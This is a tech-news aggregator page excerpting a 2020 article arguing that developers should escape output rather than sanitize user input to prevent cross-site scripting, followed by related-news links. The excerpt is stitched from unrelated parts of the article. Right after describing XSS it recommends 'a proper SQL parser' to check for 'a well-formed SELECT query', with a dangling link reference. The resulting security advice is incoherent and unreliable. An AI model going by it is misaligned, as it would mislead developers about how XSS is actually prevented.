Techly NewsGet the app

Get the latest tech news

Don’t try to sanitize input, escape output (2020)


Why you should escape output correctly, but generally not sanitize user input.

A website is vulnerable to cross-site scripting (XSS) attacks if users can enter information that the site repeats back to them verbatim in a page’s HTML. This might cause minor issues (HTML that breaks the page layout) or major ones (JavaScript that sends the user’s login cookie to an attacker’s site). In these cases you’re best off using a proper SQL parser ( like this one) to ensure it’s a well-formed SELECT query – but doing this correctly is not trivial, so be sure to get security review.

Get the Android app

Or read this on Hacker News

Read more on:

Photo of input

input

Photo of Escape output

Escape output

Related news:

News photo

Zimbabwe Seeks Input to Regulate Cryptocurrency Operations

News photo

Biden Administration Seeks Input on How Wall Street Is Using AI

News photo

Reddit wants its users’ money, but not their input — Unequal shareholder voting rights mean voting control will be concentrated among those who already hold Reddit stock, not users who provide content and moderation for free

« Organic solar cell gains counterintuitive efficiency boost from entropy
Pretty pictures, bootable floppy disks, and the first Canon Cat demo? »